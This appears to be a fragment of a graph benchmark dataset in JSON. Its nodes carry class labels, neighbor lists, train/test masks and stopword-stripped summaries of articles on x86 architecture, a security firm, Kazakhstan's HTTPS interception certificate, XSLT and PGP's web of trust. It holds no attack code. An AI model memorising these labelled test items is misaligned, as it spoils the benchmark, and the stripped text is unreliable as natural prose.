80-bit-wide fpu stack pentium iii intel added 32-bit streaming simd extensions sse control/status register mxcsr eight 128-bit sse floating point registers xmm0 xmm7 starting amd opteron processor x86 architecture extended 32-bit registers 64-bit registers way similar 16 32-bit extension took place r-prefix identifies 64-bit registers rax rbx rcx rdx rsi rdi rbp rsp rflags rip eight additional 64-bit general registers r8-r15 also introduced creation x86-64 however extensions usable 64-bit mode one two modes available long mode addressing modes dramatically changed 32-bit mode except addressing extended 64 bits virtual addresses sign extended 64 bits order disallow mode bits virtual addresses selector details dramatically reduced addition addressing mode added allow memory references relative rip instruction pointer ease implementation position-independent code used shared libraries operating systems simd registers xmm0–xmm15 simd registers ymm0–ymm15 simd registers zmm0–zmm31 x86 processors protected mode i.e 80286 later processors also three descriptor registers gdtr ldtr idtr task register tr 32-bit x86 processors starting 80386 also include various special/miscellaneous registers control registers cr0 4 cr8 64-bit debug registers dr0 3 plus 6 7 test registers tr3 7 80486 model-specific registers msrs appearing pentium although main registers exception instruction pointer general-purpose 32-bit 64-bit versions instruction set used anything originally envisioned used following purposes segment registers particular purposes envisioned 8 registers available 64-bit mode instructions compile execute efficiently using registers designed purpose example using al accumulator adding immediate byte value produces efficient add al opcode 04h whilst using bl register produces generic longer add register opcode 80c3h another example double precision division multiplication works specifically ax dx registers modern compilers benefited introduction sib byte scale-index-base byte allows registers treated uniformly minicomputer-like however using sib byte universally non-optimal produces longer encodings using selectively necessary main benefit sib byte orthogonality powerful addressing modes provides make possible save instructions use registers address calculations scaling index special instructions lost priority hardware design became slower equivalent small code sequences notable example lodsw instruction note pl registers available 64-bit mode note il registers available 64-bit mode real address mode commonly called real mode operating mode 8086 later x86-compatible cpus real mode characterized 20-bit segmented memory address space meaning 1 mib memory addressed—actually slightly direct software access peripheral hardware concept memory protection multitasking hardware level x86 cpus 80286 series later start real mode power-on 80186 cpus earlier one operational mode equivalent real mode later chips ibm pc platform direct software access ibm bios routines available real mode since bios written real mode however characteristic x86 cpu ibm bios design order use 64 kb memory segment registers must used created great complications compiler implementors introduced odd pointer modes near far huge leverage implicit nature segmented architecture different degrees pointers containing 16-bit offsets within implied segments pointers containing segment addresses offsets within segments technically possible use 256 kb memory code data 64 kb code setting four segment registers using 16-bit offsets optionally default-segment override prefixes address memory puts substantial restrictions way data addressed memory operands combined violates architectural intent intel designers separate data items e.g arrays structures code units contained separate segments addressed segment addresses new programs ported earlier 8-bit processors 16-bit address spaces addition real mode intel 80286 supports protected mode expanding addressable physical memory 16 mb addressable virtual memory 1 gb providing protected memory prevents programs corrupting one another done using segment registers storing index descriptor table stored memory two tables global descriptor table gdt local descriptor table ldt holding 8192 segment descriptors segment giving access 64 kb memory 80286 segment descriptor provides 24-bit base address base address added 16-bit offset create absolute address base address table fulfills role literal value segment register fulfills real mode segment registers converted direct registers indirect registers segment assigned one four ring levels used hardware-based computer security segment descriptor also contains segment limit field specifies maximum offset may used segment offsets 16 bits segments still limited 64 kb 80286 protected mode time segment register loaded protected mode 80286 must read 6-byte segment descriptor memory set hidden internal registers therefore loading segment registers much slower protected mode real mode changing segments frequently avoided actual memory operations using protected mode segments slowed much 80286 later hardware check offset segment limit parallel instruction execution intel 80386 extended offsets also segment limit field segment descriptor 32 bits enabling segment span entire memory space also introduced support protected mode paging mechanism making possible use paged virtual memory 4 kb page size paging allows cpu map page virtual memory space page physical memory space uses additional mapping tables memory called page tables protected mode 80386 operate paging either enabled disabled segmentation mechanism always active generates virtual addresses mapped paging mechanism enabled segmentation mechanism also effectively disabled setting segments base address 0 size limit equal whole address space also requires minimally-sized segment descriptor table four descriptors since fs gs segments need used paging used extensively modern multitasking operating systems linux 386bsd windows nt developed 386 first intel architecture cpu support paging 32-bit segment offsets 386 architecture became basis development x86 series x86 processors support protected mode boot real mode backward compatibility older 8086 class processors upon power-on a.k.a booting processor initializes real mode begins executing instructions operating system boot code might stored rom may place processor protected mode enable paging features instruction set protected mode similar used real mode however certain constraints apply real mode able use ax cx dx addressing apply protected mode conversely segment arithmetic common practice real mode code allowed protected mode also sub-mode operation 32-bit protected mode a.k.a 80386 protected mode called virtual 8086 mode also known v86 mode basically special hybrid operating mode allows real mode programs operating systems run control protected mode supervisor operating system allows great deal flexibility running protected mode programs real mode programs simultaneously mode exclusively available 32-bit version protected mode exist 16-bit version protected mode long mode mid 1990s obvious 32-bit address space x86 architecture limiting performance applications requiring large data sets 32-bit address space would allow processor directly address 4 gb data size surpassed applications video processing database engines using 64-bit addresses possible directly address 16 eib data although 64-bit architectures support access full 64-bit address space example amd64 supports 48 bits 64-bit address split four paging levels 1999 amd published nearly complete specification 64-bit extension x86 architecture called x86-64 claimed intentions produce design currently used almost x86 processors exceptions intended embedded systems mass-produced x86-64 chips general market available four years later 2003 time spent working prototypes tested refined time initial name x86-64 changed amd64 success amd64 line processors coupled lukewarm reception ia-64 architecture forced intel release implementation amd64 instruction set intel previously implemented support amd64 opted enable hopes amd would bring amd64 market itanium new ia-64 instruction set widely adopted branded implementation amd64 em64t later re-branded intel 64 literature product version names microsoft sun refer amd64/intel 64 collectively x64 windows solaris operating systems linux distributions refer either x86-64 variant x86_64 amd64 bsd systems use amd64 macos uses x86_64 long mode mostly extension 32-bit instruction set unlike 16–to–32-bit transition many instructions dropped 64-bit mode affect actual binary backward compatibility would execute legacy code modes retain support instructions changes way assembler compilers new code work first time major extension x86 architecture initiated originated manufacturer intel also first time intel accepted technology nature outside source early x86 processors could extended floating-point hardware form series floating point numerical co-processors names like 8087 80287 80387 abbreviated x87 also known npx numeric processor extension apt name since coprocessors used mainly floating-point calculations also performed integer operations binary decimal formats exceptions 80486 subsequent x86 processors integrated x87 functionality chip made x87 instructions de facto integral part x86 instruction set x87 register known st 0 st 7 80 bits wide stores numbers ieee floating-point standard double extended precision format registers organized stack st 0 top done order conserve opcode space registers therefore randomly accessible either operand register-to-register instruction st0 must always one two operands either source destination regardless whether operand st x memory operand however random access stack registers obtained instruction exchanges specified st x st 0 operations include arithmetic transcendental functions including trigonometric exponential functions well instructions load common constants 0 1 e base natural logarithm log2 10 log10 2 one stack registers integer capability often overlooked x87 operate larger integers single instruction 8086 80286 80386 x86 cpu without 64-bit extensions repeated integer calculations even small values e.g 16-bit accelerated executing integer instructions x86 cpu x87 parallel x86 cpu keeps running x87 coprocessor calculates x87 sets signal x86 finished interrupts x86 needs attention error mmx simd instruction set designed intel introduced 1997 pentium mmx microprocessor mmx instruction set developed similar concept first used intel i860 supported subsequent ia-32 processors intel vendors mmx typically used video processing multimedia applications instance mmx added 8 new registers architecture known mm0 mm7 henceforth referred mmn reality new registers aliases existing x87 fpu stack registers hence anything done floating point stack would also affect mmx registers unlike fp stack mmn registers fixed relative therefore randomly accessible instruction set adopt stack-like semantics existing operating systems could still correctly save restore register state multitasking without modifications mmn registers 64-bit integers however one main concepts mmx instruction set concept packed data types means instead using whole register single 64-bit integer quadword one may use contain two 32-bit integers doubleword four 16-bit integers word eight 8-bit integers byte given mmx 64-bit mmn registers aliased fpu stack floating point registers 80 bits wide upper 16 bits floating point registers unused mmx bits set ones mmx instruction correspond floating point representation nans infinities 1997 amd introduced 3dnow introduction technology coincided rise 3d entertainment applications designed improve cpu vector processing performance graphic-intensive applications 3d video game developers 3d graphics hardware vendors use 3dnow enhance performance amd k6 athlon series processors 3dnow designed natural evolution mmx integers floating point uses exactly register naming convention mmx mm0 mm7 difference instead packing integers registers two single precision floating point numbers packed register advantage aliasing fpu registers instruction data structures used save state fpu registers also used save 3dnow register states thus special modifications required made operating systems would otherwise know 1999 intel introduced streaming simd extensions sse instruction set following 2000 sse2 first addition allowed offloading basic floating-point operations x87 stack second made mmx almost obsolete allowed instructions realistically targeted conventional compilers introduced 2004 along prescott revision pentium 4 processor sse3 added specific memory thread-handling instructions boost performance intel hyperthreading technology amd licensed sse3 instruction set implemented sse3 instructions revision e later athlon 64 processors athlon 64 support hyperthreading lacks sse3 instructions used hyperthreading sse discarded legacy connections fpu stack also meant instruction set discarded legacy connections previous generations simd instruction sets like mmx freed designers allowing use larger registers limited size fpu registers designers created eight 128-bit registers named xmm0 xmm7 note amd64 number sse xmm registers increased 8 16 however downside operating systems awareness new set instructions order able save register states intel created slightly modified version protected mode called enhanced mode enables usage sse instructions whereas stay disabled regular protected mode os aware sse activate enhanced mode whereas unaware os enter traditional protected mode sse simd instruction set works floating point values like 3dnow however unlike 3dnow severs legacy connection fpu stack larger registers 3dnow sse pack twice number single precision floats registers original sse limited single-precision numbers like 3dnow sse2 introduced capability pack double precision numbers 3dnow possibility since double precision number 64-bit size would full size single 3dnow mmn register 128 bits sse xmmn registers could pack two double precision floats one register thus sse2 much suitable scientific calculations either sse1 3dnow limited single precision sse3 introduce additional registers physical address extension pae first added intel pentium pro later amd athlon processors allow 64 gb ram addressed without pae physical ram 32-bit protected mode usually limited 4 gb pae defines different page table structure wider page table entries third level page table allowing additional bits physical address although initial implementations 32-bit processors theoretically supported 64 gb ram chipset platform limitations often restricted could actually used x64 processors define page table structures theoretically allow 52 bits physical address although chipset platform concerns like number dimm slots available maximum ram possible per dimm prevent large physical address space realized x64 processors pae mode must active switch long mode must remain active long mode active long mode non-pae mode pae mode affect width linear virtual addresses 2000s 32-bit x86 processors limitations memory addressing obstacle utilization high-performance computing clusters powerful desktop workstations aged 32-bit x86 competing much advanced 64-bit risc architectures could address much memory intel whole x86 ecosystem needed 64-bit memory addressing x86 survive 64-bit computing era workstation desktop software applications soon start hitting limitations present 32-bit memory addressing however intel felt right time make bold step use transition 64-bit desktop computers transition away x86 architecture general experiment ultimately failed 2001 intel attempted introduce non-x86 64-bit architecture named ia-64 itanium processor initially aiming high-performance computing market hoping would eventually replace 32-bit x86 ia-64 incompatible x86 itanium processor provide emulation capabilities translating x86 instructions ia-64 affected performance x86 programs badly rarely ever actually useful users programmers rewrite x86 programs ia-64 architecture performance itanium would orders magnitude worse true x86 processor market rejected itanium processor since broke backward compatibility preferred continue using x86 chips programs rewritten ia-64 amd decided take another path toward 64-bit memory addressing making sure backward compatibility would suffer april 2003 amd released first x86 processor 64-bit general-purpose registers opteron capable addressing much 4 gb virtual memory using new x86-64 extension also known amd64 x64 64-bit extensions x86 architecture enabled newly introduced long mode therefore 32-bit 16-bit applications operating systems could simply continue using amd64 processor protected modes without even slightest sacrifice performance full compatibility back original instructions 16-bit intel 8086 market responded positively adopting 64-bit amd processors high-performance applications business home computers seeing market rejecting incompatible itanium processor microsoft supporting amd64 intel respond introduced x86-64 processor prescott pentium 4 july 2004 result itanium processor ia-64 instruction set rarely used x86 x86-64 incarnation still dominant cpu architecture non-embedded computers x86-64 also introduced nx bit offers protection security bugs caused buffer overruns result amd 64-bit contribution x86 lineage subsequent acceptance intel 64-bit risc architectures ceased threat x86 ecosystem almost disappeared workstation market x86-64 began utilized powerful supercomputers amd opteron intel xeon incarnations market previously natural habitat 64-bit risc designs ibm power microprocessors sparc processors great leap toward 64-bit computing maintenance backward compatibility 32-bit 16-bit software enabled x86 architecture become extremely flexible platform today x86 chips utilized small low-power systems example intel quark intel atom fast gaming desktop computers example intel core i7 amd fx/ryzen even dominate large supercomputing clusters effectively leaving arm 32-bit 64-bit risc architecture competitor smartphone tablet market prior 2005 x86 architecture processors unable meet popek goldberg requirements specification virtualization created 1974 gerald j. popek robert p. goldberg however proprietary open-source x86 virtualization hypervisor products developed using software-based virtualization proprietary systems include hyper-v parallels workstation vmware esx vmware workstation vmware workstation player windows virtual pc free open-source systems include qemu kqemu virtualbox xen introduction amd-v intel vt-x instruction sets 2005 allowed x86 processors meet popek goldberg virtualization requirements",
    "neighbors": [
      4098,
      6148,
      6150,
      6151,
      6153,
      4108,
      13,
      2062,
      6158,
      10254,
      2066,
      4114,
      4120,
      2081,
      10273,
      6180,
      6181,
      10277,
      8231,
      2088,
      10284,
      8243,
      4150,
      8248,
      4156,
      6207,
      2113,
      6213,
      4173,
      6228,
      10325,
      10333,
      96,
      4194,
      2149,
      4204,
      8301,
      4217,
      8315,
      6268,
      8322,
      2179,
      132,
      4228,
      8325,
      4237,
      4238,
      10383,
      4248,
      2201,
      6296,
      4252,
      4255,
      8352,
      8355,
      2224,
      178,
      2226,
      4276,
      2237,
      4286,
      6333,
      2241,
      2243,
      6339,
      6340,
      8390,
      6345,
      10463,
      226,
      6371,
      10478,
      242,
      10482,
      10485,
      8439,
      249,
      6393,
      255,
      6415,
      10516,
      8474,
      2334,
      4386,
      2339,
      292,
      6438,
      295,
      2345,
      6445,
      10548,
      309,
      8501,
      8506,
      318,
      6462,
      6463,
      321,
      8514,
      10564,
      4423,
      4424,
      2380,
      6476,
      8524,
      6483,
      344,
      4441,
      10584,
      8539,
      4444,
      8543,
      6501,
      8551,
      10601,
      10603,
      6508,
      4465,
      372,
      10612,
      10620,
      10623,
      8576,
      6529,
      389,
      4491,
      398,
      8590,
      2452,
      10646,
      407,
      409,
      2462,
      8609,
      10658,
      4515,
      10663,
      6570,
      4523,
      2476,
      8621,
      10669,
      432,
      2480,
      8624,
      435,
      8625,
      10675,
      4537,
      2490,
      10689,
      6596,
      453,
      2503,
      2506,
      466,
      2514,
      473,
      2523,
      10715,
      477,
      2525,
      4581,
      487,
      8680,
      8684,
      10734,
      6639,
      499,
      4596,
      6643,
      4598,
      10746,
      4603,
      508,
      8700,
      2558,
      10752,
      6659,
      10757,
      518,
      8716,
      10764,
      4622,
      528,
      10768,
      6675,
      4630,
      10779,
      8732,
      10780,
      10781,
      10786,
      10796,
      6705,
      570,
      2620,
      6716,
      2623,
      576,
      10820,
      585,
      6730,
      2637,
      2638,
      4695,
      602,
      8795,
      2655,
      2658,
      6754,
      10851,
      10856,
      2666,
      8815,
      6768,
      8820,
      8821,
      630,
      8822,
      633,
      636,
      639,
      6787,
      4742,
      6797,
      8851,
      6804,
      661,
      4758,
      6806,
      8853,
      8857,
      2719,
      6815,
      6818,
      6821,
      8890,
      704,
      6852,
      8901,
      2761,
      6858,
      8907,
      722,
      6868,
      725,
      10966,
      731,
      10971,
      2791,
      4841,
      10985,
      8940,
      8944,
      757,
      2805,
      2808,
      2811,
      6911,
      4865,
      2821,
      6921,
      6924,
      6925,
      6926,
      8976,
      8977,
      787,
      4884,
      4886,
      6934,
      799,
      8992,
      802,
      6950,
      11050,
      6957,
      815,
      823,
      6971,
      831,
      4928,
      833,
      4929,
      6978,
      6979,
      11080,
      4943,
      9044,
      9048,
      7008,
      11107,
      2925,
      2933,
      7033,
      4989,
      894,
      7039,
      11135,
      9095,
      5006,
      9107,
      9111,
      7071,
      9119,
      9126,
      936,
      7082,
      2987,
      5035,
      5040,
      9137,
      7093,
      9141,
      7095,
      5051,
      9151,
      9152,
      7106,
      3014,
      5063,
      9158,
      5065,
      7117,
      9166,
      975,
      5072,
      977,
      5073,
      11218,
      982,
      5080,
      7134,
      5088,
      3042,
      995,
      5090,
      1000,
      9194,
      1005,
      3053,
      5103,
      5109,
      5110,
      11257,
      3070,
      3071,
      1029,
      7173,
      3079,
      5134,
      1042,
      1053,
      3102,
      7204,
      7218,
      5178,
      1083,
      11322,
      1085,
      7234,
      3142,
      5190,
      1103,
      1115,
      9309,
      1119,
      1122,
      3175,
      1137,
      5234,
      5235,
      9331,
      1145,
      3194,
      9337,
      3197,
      9342,
      9343,
      3204,
      11396,
      7307,
      11405,
      7313,
      9363,
      9369,
      7323,
      11424,
      1185,
      3235,
      7332,
      3246,
      9391,
      11447,
      5309,
      5312,
      3270,
      3272,
      5326,
      5329,
      7377,
      11473,
      9428,
      7382,
      5335,
      3294,
      1247,
      5343,
      11487,
      9444,
      3304,
      11499,
      5356,
      9452,
      5358,
      5363,
      3317,
      5368,
      5369,
      11513,
      3323,
      3324,
      7421,
      7425,
      5378,
      5380,
      5386,
      1298,
      11539,
      5396,
      3352,
      9500,
      5409,
      11559,
      3369,
      3371,
      11566,
      9525,
      11580,
      9533,
      5444,
      1349,
      9541,
      9547,
      7501,
      5457,
      7505,
      11601,
      7508,
      11604,
      5467,
      9563,
      1376,
      9579,
      9581,
      9582,
      7538,
      1399,
      9592,
      1402,
      9597,
      5503,
      3457,
      3459,
      9611,
      9612,
      3470,
      5518,
      1425,
      1427,
      5523,
      3477,
      9625,
      11678,
      1444,
      1445,
      9637,
      1448,
      7595,
      1461,
      1463,
      7607,
      9655,
      5569,
      9665,
      9668,
      1480,
      1489,
      3542,
      9689,
      1499,
      1501,
      1502,
      5598,
      7645,
      7653,
      7657,
      1515,
      9707,
      3565,
      5619,
      3573,
      9723,
      3585,
      3586,
      7687,
      7689,
      9739,
      9741,
      9742,
      5649,
      7699,
      5655,
      5663,
      7717,
      3630,
      9774,
      5681,
      1594,
      1600,
      7755,
      7760,
      1632,
      7783,
      3702,
      1660,
      5756,
      9861,
      1677,
      1682,
      5785,
      7833,
      7838,
      3745,
      5793,
      1702,
      7852,
      7854,
      7857,
      7858,
      9907,
      9911,
      9913,
      9932,
      5840,
      5844,
      7904,
      7911,
      9959,
      9964,
      5871,
      1776,
      5873,
      7919,
      7920,
      9976,
      5883,
      7938,
      5892,
      7941,
      1798,
      1801,
      9996,
      3857,
      7963,
      1820,
      5922,
      1832,
      3882,
      3883,
      10026,
      3886,
      7983,
      7984,
      1848,
      1849,
      5948,
      7997,
      5956,
      3911,
      1865,
      10062,
      10076,
      8035,
      3943,
      3945,
      8044,
      3950,
      1903,
      10095,
      6006,
      1911,
      1915,
      3966,
      10111,
      6016,
      8066,
      3973,
      8069,
      6025,
      10127,
      1937,
      8082,
      10133,
      6038,
      6044,
      10142,
      8102,
      10153,
      1967,
      6065,
      1972,
      8120,
      8125,
      4030,
      6078,
      8126,
      6082,
      8131,
      6087,
      8136,
      6093,
      1998,
      8143,
      10202,
      10208,
      8161,
      6118,
      10220,
      10223,
      6129
    ],
    "mask": "Test"
  },
  {
    "node_id": 500,
    "label": 4,
    "text": "IViz_Security:iviz security iviz security information security company on-demand application penetration testing proactive security audit risk management compliance standards sox pci hipaa company founded bikash barai nilanjan de 2005 funded idg ventures company got acquired cigital inc 2014",
    "neighbors": [
      3880
    ],
    "mask": "None"
  },
  {
    "node_id": 501,
    "label": 4,
    "text": "Kazakhstan_man-in-the-middle_attack:kazakhstan man-in-the-middle attack 2015 government kazakhstan created national security certificate would allowed man-in-the-middle attack https traffic internet users kazakhstan attack would involve requiring internet users install root certificate controlled kazakh government devices allowing intercept decrypt re-encrypt traffic passing systems controlled july 2019 kazakh isps started messaging users certificates would installed users",
    "neighbors": [
      513,
      1157,
      517,
      1288,
      9744,
      1688,
      2083,
      8358,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      5107,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 502,
    "label": 9,
    "text": "XSLT:xslt xslt extensible stylesheet language transformations language transforming xml documents xml documents formats html web pages plain text xsl formatting objects may subsequently converted formats pdf postscript png xslt 1.0 widely supported modern web browsers original document changed rather new document created based content existing one typically input documents xml files anything processor build xquery xpath data model used relational database tables geographical information systems although xslt designed special-purpose language xml transformation language turing-complete making theoretically capable arbitrary computations xslt influenced functional languages text-based pattern matching languages like snobol awk direct predecessor dsssl sgml xslt xml xslt processor takes one xml source documents plus one xslt stylesheets processes produce output document contrast widely implemented imperative programming languages like c xslt declarative basic processing paradigm pattern matching rather listing imperative sequence actions perform stateful environment template rules define handle node matching particular xpath-like pattern processor happen encounter one contents templates effectively comprise functional expressions directly represent evaluated form result tree basis processor output processor follows fixed algorithm first assuming stylesheet already read prepared processor builds source tree input xml document processes source tree root node finds best-matching template node stylesheet evaluates template contents instructions template generally direct processor either create nodes result tree process nodes source tree way root node output derives result tree xslt uses xpath identify subsets source document tree perform calculations xpath also provides range functions xslt augments xslt 1.0 uses xpath 1.0 xslt 2.0 uses xpath 2.0 xslt 3.0 work either xpath 3.0 3.1 case 1.0 2.0 xslt xpath specifications published date 3.0 however longer synchronized xpath 3.0 became recommendation april 2014 followed xpath 3.1 february 2017 xslt 3.0 followed june 2017 xslt functionalities overlap xquery initially conceived query language large collections xml documents xslt 2.0 xquery 1.0 standards developed separate working groups within w3c working together ensure common approach appropriate share data model type system function library include xpath 2.0 sublanguage two languages however rooted different traditions serve needs different communities xslt primarily conceived stylesheet language whose primary goal render xml human reader screen web web template language paper xquery primarily conceived database query language tradition sql two languages originate different communities xslt stronger handling narrative documents flexible structure xquery stronger data handling example performing relational joins codice_1 element optionally take attribute codice_2 allows one set media type mime type resulting output example codice_3 xslt 1.0 recommendation recommends general attribute types codice_4 codice_5 since long time registered media type xslt time codice_6 became de facto standard xslt 1.0 specified codice_2 values used release xslt 2.0 w3c recommended registration mime media type codice_8 later registered internet assigned numbers authority pre-1.0 working drafts xslt used codice_6 embedding examples type implemented continues promoted microsoft internet explorer msxml also widely recognized codice_10 processing instruction browsers practice therefore users wanting control transformation browser using processing instruction obliged use unregistered media type examples use following incoming xml document xslt stylesheet provides templates transform xml document evaluation results new xml document another structure processing following example xslt file xml input file shown results following xhtml whitespace adjusted clarity xhtml generates output rendered web browser order web browser able automatically apply xsl transformation xml document display xml stylesheet processing instruction inserted xml example stylesheet example 2 available example2.xsl following instruction could added original incoming xml example codice_6 technically incorrect according w3c specifications say type codice_8 media type widely supported across browsers 2009 early xslt processors interpreters recently code generation increasingly common using portable intermediate languages java bytecode .net common intermediate language target however even interpretive products generally offer separate analysis execution phases allowing optimized expression tree created memory reused perform multiple transformations gives substantial performance benefits online publishing applications transformation applied many times per second different source documents separation reflected design xslt processing apis jaxp early xslt processors optimizations stylesheet documents read document object models processor would act directly xpath engines also optimized increasingly however xslt processors use optimization techniques found functional programming languages database query languages static rewriting expression tree e.g. move calculations loops lazy pipelined evaluation reduce memory footprint intermediate results allow early exit processor evaluate expression codice_15 without complete evaluation subexpressions many processors also use tree representations significantly efficient space time general-purpose dom implementations june 2014 debbie lockett michael kay introduced open-source benchmarking framework xslt processors called xt-speedo",
    "neighbors": [
      9345,
      11650,
      5765,
      3462,
      7943,
      5896,
      8070,
      1802,
      8201,
      8582,
      6797,
      2062,
      5907,
      11414,
      668,
      9245,
      10910,
      7455,
      4768,
      7074,
      9124,
      9125,
      5030,
      10791,
      11307,
      5677,
      10413,
      2739,
      692,
      8628,
      3894,
      9780,
      5048,
      9150,
      6335,
      578,
      8644,
      2374,
      8262,
      9286,
      7753,
      9926,
      7627,
      10569,
      10953,
      9808,
      10453,
      5078,
      4057,
      8923,
      8158,
      479,
      1250,
      9828,
      6629,
      487,
      11625,
      8554,
      4728,
      5997,
      8430,
      9841,
      3954,
      10611,
      2804,
      4213,
      4984,
      6775,
      2296,
      3577,
      10486,
      3323,
      124,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 503,
    "label": 4,
    "text": "Web_of_trust:web trust cryptography web trust concept used pgp gnupg openpgp-compatible systems establish authenticity binding public key owner decentralized trust model alternative centralized trust model public key infrastructure pki relies exclusively certificate authority hierarchy computer networks many independent webs trust user identity certificate part link multiple webs web trust concept first put forth pgp creator phil zimmermann 1992 manual pgp version 2.0 openpgp-compliant implementations include certificate vetting scheme assist operation termed web trust openpgp identity certificates include one public keys along owner information digitally signed users act endorse association public key person entity listed certificate commonly done key signing parties openpgp-compliant implementations also include vote counting scheme used determine public key – owner association user trust using pgp instance three partially trusted endorsers vouched certificate included public key – owner binding one fully trusted endorser done association owner public key certificate trusted correct parameters user-adjustable e.g. partials perhaps six partials completely bypassed desired scheme flexible unlike public key infrastructure designs leaves trust decisions hands individual users perfect requires caution intelligent supervision users essentially pki designs less flexible require users follow trust endorsement pki generated certificate authority ca -signed certificates two keys pertaining person public key shared openly private key withheld owner owner private key decrypt information encrypted public key web trust user ring group people public keys users encrypt information recipient public key recipient private key decrypt user digitally signs information private key recipient verifies users public key confirm user question ensure information came specific user tampered intended recipient read information know private key contrast typical x.509 pki permits certificate signed single party certificate authority ca ca certificate may signed different ca way 'self-signed root certificate root certificates must available use lower level ca certificate typically distributed widely instance distributed applications browsers email clients way ssl/tls-protected web pages email messages etc authenticated without requiring users manually install root certificates applications commonly include one hundred root certificates dozens pkis thus default bestowing trust throughout hierarchy certificates lead back wot favors decentralization trust anchors avoid single point failure ca hierarchy notable project uses wot pki provide framework authentication areas internet monkeysphere utilities openpgp web trust essentially unaffected things company failures continued function little change however related problem occur users whether individuals organizations lose track private key longer decrypt messages sent produced using matching public key found openpgp certificate early pgp certificates include expiry dates certificates unlimited lives users prepare signed cancellation certificate time matching private key lost compromised one prominent cryptographer still getting messages encrypted using public key long ago lost track private key ca n't much messages except discard notifying sender unreadable requesting resending public key still matching private key later pgp openpgp compliant certificates include expiry dates automatically preclude troubles eventually used sensibly problem also easily avoided use designated revokers introduced early 1990s key owner may designate third party permission revoke key owner key case key owner loses private key thus loses ability revoke public key non-technical social difficulty web trust like one built pgp/openpgp type systems every web trust without central controller e.g. ca depends users trust new certificates i.e. produced process generating new key pair likely readily trusted users systems personally met find enough endorsements new certificate many web trust users certificate vetting set require one fully trusted endorsers otherwise unknown certificate perhaps several partial endorsers using public key certificate prepare messages believe signatures etc despite wide use openpgp compliant systems easy availability on-line multiple key servers possible practice unable readily find someone several people endorse new certificate e.g. comparing physical identification key owner information digitally signing new certificate users remote areas undeveloped ones instance may find users scarce certificate also new endorsements others signature new certificate offer marginal benefit toward becoming trusted still parties systems able securely exchange messages key signing parties relatively popular mechanism resolve problem finding users install one certificate existing webs trust endorsing websites also exist facilitate location openpgp users arrange keysignings gossamer spider web trust also makes key verification easier linking openpgp users via hierarchical style web trust end users benefit coincidental determined trust someone endorsed introducer explicitly trusting gswot top-level key minimally level 2 introducer top-level key endorses level 1 introducers possibility finding chains certificates often justified small world phenomenon given two individuals often possible find short chain people person chain knows preceding following links however chain necessarily useful person encrypting email verifying signature find chain signatures private key correspondent also trust person chain honest competent signing keys judge whether people likely honestly follow guidelines verifying identity people signing keys much stronger constraint another obstacle also various costs timing involve side physically attend key signing party meet someone physically verify id person key email address planning scheduling early-appointment travel lodging food etc software user may need verify hundreds software components hundreds original developers wot based specific-users trust-chain establish trust level software components millions billions software users practically physically travel meet hundreds specific-users wot hundreds original developers authors located different parts world propagation spread rate very-trustworthy physically-verified person id email-address public-key wot slower lesser original developer author file-releaser pgp/gpg key collected public keyserver various ways vulnerabilities mis-guide users deliver incorrect data public keyserver pool keyservers also type third-party 3rd-party middle-man original author developer also publishes shares updated original public-key file-signing pub-key keyserver domain webserver inside premise own-home own-home-office own-office forces hkps encrypted connection usage public-key delivery users get correct trusted unmodified key details see wot assisting solutions section strong set refers largest collection strongly connected pgp keys forms basis global web trust two keys strong set path islands sets keys sign disconnected group exist one member group needs exchange signatures strong set group also become part strong set strong set size 55000 keys beginning year 2015 statistical analysis pgp/gnupg/openpgp web trust mean shortest distance msd one measurement trusted given pgp key within strongly connected set pgp keys make web trust msd become common metric analysis sets pgp keys often see msd calculated given subset keys compared global msd generally refers keys ranking within one larger key analyses global web trust physically meeting original developer author always best way obtain distribute verify trust pgp/gpg keys highest trust level remain best level best trustworthy way publishing gpg/pgp full key full key fingerprint on/with widely known physical/paper-material based book original author/developer 2nd best form sharing trustworthy key users meeting developer author users research developer author book library via internet aware developer author photo work pub-key fingerprint email-address etc however practical millions users want communicate message securely physically meet recipient users also practical millions software users need physically meet hundreds software developers authors whose software file signing pgp/gpg public key want verify trust ultimately use computers therefore one trusted third-party authority ttpa type entity group need available users usable users entity/group need capable providing trusted-verification trust-delegation services millions users around world time practically verify downloaded received content data email file authenticity user need verify downloaded main content main data/email main file pgp/gpg signature code/file asc sig users would need use original developer original author trustworthy verified public-key users would need use trustworthy file-signing public-key trusted-by original owner public-key really trust specific pgp/gpg key users would need physically meet specific original author developer users would need physically meet original-releaser file-signing pub-key users would need find another alternative trustworthy user trusted-chain wot aka another user another developer another author trusted specific original author developer physically meet person verify real id his/her pgp/gpg key also provide id key user side sign/certify trust pgp/gpg key whether software popular software users usually located around world different locations physically possible original author developer file-releaser provide public-key trust id verification services millions users neither practical millions software users physically meet every software every software-library every piece code developer author releaser use need use computers even multiple trusted people/person original-author trusted-chain wot still physically practically possible every developer author meet every users also possible every users meet hundreds developers whose software using working decentralized hierarchy based wot chain model become popular used nearby users physical meeting pub-key certify sign procedure wot easier solutions original author/developer need first set trust-level sign/certify file-signing key updated public-keys updated file-signing public-keys must also published distributed made accessible users via online secure encrypted mediums user location world get correct trusted unmodified public-key make sure users getting correct trusted public-keys signed-code/file original dev/author original-releaser must publish updated public-keys keyserver force hkps encrypted connection usage publish updated full public-keys signed-code/file https encrypted webpage webserver primary domain website not-from sub-domains located external-servers not-from mirror not-from external/shared forum/wiki etc website servers not-from public external/shared cloud hosting service servers must located kept securely inside premises own-home own-home-office own-office way small pieces original keys/code travel intact internet remain unmodified transit encrypted connection reach destination without eavesdropped modified user side treated trustworthy public-keys single multi channel ttpa based verification public-key obtained original developer web-server via one ttpa trusted third party authority based secured verified encrypted connection trustworthy original public-keys/signed-codes shown original dev author webserver keyserver encrypted connection encrypted webpage files data content transferred type non-encrypted connection like http/ftp etc sub-domain server mirror shared cloud/hosting servers non-encrypted connection based downloaded items/data/files authenticated later using original public-keys/signed-codes obtained original author's/developer server secured encrypted trusted aka verified connection/channels using encrypted connection transfer keys signed/signature code/files allow software users delegate trust pki ttpa trusted third party authority like public ca certificate authority help providing trusted connection original developer/author webserver millions worldwide users computers time original author/developer domain-name name-server signed dnssec used ssl/tls public certificate declared/shown tlsa/dane dnssec dns resource-record ssl/tls certs trust chain pinned used via hpkp technique web servers web-server webpage data also verified via another pki ttpa dnssec dns namespace maintainer icann public ca dnssec another form pgp/gpg wot name-servers creates trusted-chain name-servers first instead people/person people/person 